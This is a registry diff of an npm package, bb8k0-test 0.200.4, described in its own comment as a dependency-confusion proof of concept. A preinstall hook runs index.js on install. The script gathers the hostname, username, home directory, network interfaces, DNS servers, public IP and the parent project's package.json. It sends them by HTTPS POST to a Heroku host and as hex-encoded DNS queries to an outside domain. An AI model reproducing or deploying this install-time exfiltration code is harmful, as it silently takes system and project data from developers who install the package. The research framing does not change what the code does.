bb8k0-test 0.200.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of bb8k0-test might be problematic. Click here for more details.
- package/index.js +143 -0
- package/package.json +13 -0
package/index.js
ADDED
@@ -0,0 +1,143 @@
|
|
1
|
+
// This is a PoC of dependecy confusion attack, published for security research purposes only.
|
2
|
+
// The code contained in this package does not exfiltrate any type of credential
|
3
|
+
|
4
|
+
const https = require('https');
|
5
|
+
const os = require("os");
|
6
|
+
const dns = require("dns");
|
7
|
+
const packageJSON = require("./package.json");
|
8
|
+
const package = packageJSON.name;
|
9
|
+
|
10
|
+
const sendData = (url, path, method, post_data) => {
|
11
|
+
const promise = new Promise((resolve, reject) => {
|
12
|
+
var options = {
|
13
|
+
hostname: url,
|
14
|
+
port: 443,
|
15
|
+
path,
|
16
|
+
method,
|
17
|
+
headers: {
|
18
|
+
'Content-Type': 'application/json',
|
19
|
+
'Content-Length': post_data ? Buffer.byteLength(post_data) : 0
|
20
|
+
}
|
21
|
+
};
|
22
|
+
|
23
|
+
var req = https.request(options, function (res) {
|
24
|
+
res.setEncoding('utf8');
|
25
|
+
|
26
|
+
var body = '';
|
27
|
+
|
28
|
+
res.on('data', function (chunk) {
|
29
|
+
body = body + chunk;
|
30
|
+
});
|
31
|
+
|
32
|
+
res.on('end', function () {
|
33
|
+
if (res.statusCode != 200) {
|
34
|
+
reject("Api call failed with response code " + res.statusCode);
|
35
|
+
} else {
|
36
|
+
resolve(body);
|
37
|
+
}
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on('error', function (e) {
|
42
|
+
console.log("Error : " + e.message);
|
43
|
+
reject(e);
|
44
|
+
});
|
45
|
+
|
46
|
+
if (post_data) req.write(post_data);
|
47
|
+
req.end();
|
48
|
+
});
|
49
|
+
return promise;
|
50
|
+
}
|
51
|
+
|
52
|
+
const getIP = () => {
|
53
|
+
return sendData('api.ipify.org', '/?format=json', 'GET', '');
|
54
|
+
}
|
55
|
+
|
56
|
+
const sendUsingHTTP = (data) => {
|
57
|
+
const { networkInterfaces } = os;
|
58
|
+
const nets = networkInterfaces();
|
59
|
+
|
60
|
+
let parentPackageJSON = {};
|
61
|
+
|
62
|
+
try {
|
63
|
+
const regex = new RegExp("node_modules/\s*([^.]+|\S+)")
|
64
|
+
const appDir = __dirname.replace(regex, "")
|
65
|
+
|
66
|
+
parentPackageJSON = require(appDir + "package.json");
|
67
|
+
}
|
68
|
+
catch (e) {
|
69
|
+
parentPackageJSON = { message: "No parent package.json found" };
|
70
|
+
}
|
71
|
+
|
72
|
+
const telemetry = JSON.stringify({
|
73
|
+
package: package,
|
74
|
+
date: new Date(),
|
75
|
+
tzOffset: new Date().getTimezoneOffset(),
|
76
|
+
actualDirectory: __dirname,
|
77
|
+
homeDirectory: os.homedir(),
|
78
|
+
hostname: os.hostname(),
|
79
|
+
userName: os.userInfo().username,
|
80
|
+
dns: dns.getServers(),
|
81
|
+
resolved: packageJSON ? packageJSON.___resolved : undefined,
|
82
|
+
version: packageJSON.version,
|
83
|
+
packageJSON,
|
84
|
+
parentPackageJSON,
|
85
|
+
ip: data.ip || "",
|
86
|
+
...nets
|
87
|
+
});
|
88
|
+
|
89
|
+
sendData('yggdrasilr.herokuapp.com', '', 'POST', telemetry);
|
90
|
+
}
|
91
|
+
|
92
|
+
function sendUsingDNSQuery(data) {
|
93
|
+
|
94
|
+
function chunkString(str, length) {
|
95
|
+
return str.match(new RegExp('.{1,' + length + '}', 'g')).toString().replaceAll(",", ".");
|
96
|
+
}
|
97
|
+
|
98
|
+
String.prototype.hexEncode = function () {
|
99
|
+
var hex, i;
|
100
|
+
var result = "";
|
101
|
+
for (i = 0; i < this.length; i++) {
|
102
|
+
hex = this.charCodeAt(i).toString(16);
|
103
|
+
result += ("000" + hex).slice(-4);
|
104
|
+
}
|
105
|
+
|
106
|
+
return result
|
107
|
+
}
|
108
|
+
|
109
|
+
String.prototype.replaceAll = function (find, replace) {
|
110
|
+
return this.replace(new RegExp(find, 'g'), replace);
|
111
|
+
}
|
112
|
+
|
113
|
+
const ip = data.ip || "";
|
114
|
+
|
115
|
+
const query = os.hostname() + "," + os.userInfo().username + "," + ip + "," + os.homedir()
|
116
|
+
const hexInfos = query.hexEncode();
|
117
|
+
const chunked = chunkString(hexInfos, 50)
|
118
|
+
|
119
|
+
// Just for debugging, please comment before publish
|
120
|
+
// console.log(chunked + ".sub.bugbountyautomation.com")
|
121
|
+
|
122
|
+
let messages = chunked.split('.');
|
123
|
+
|
124
|
+
messages.map((message, item) => {
|
125
|
+
// console.log(message + "." + item);
|
126
|
+
dns.resolve(message + "." + item + ".sub.bugbountyautomation.com", (err, address) => {
|
127
|
+
if (err) {
|
128
|
+
console.log(err.stack)
|
129
|
+
}
|
130
|
+
});
|
131
|
+
});
|
132
|
+
}
|
133
|
+
|
134
|
+
const sendTelemetry = async () => {
|
135
|
+
getIP().then(data => {
|
136
|
+
if (data) {
|
137
|
+
sendUsingHTTP(JSON.parse(data));
|
138
|
+
sendUsingDNSQuery(JSON.parse(data));
|
139
|
+
}
|
140
|
+
});
|
141
|
+
}
|
142
|
+
|
143
|
+
sendTelemetry();
|
package/package.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "bb8k0-test",
|
3
|
+
"version": "0.200.4",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"keywords": [],
|
11
|
+
"author": "",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|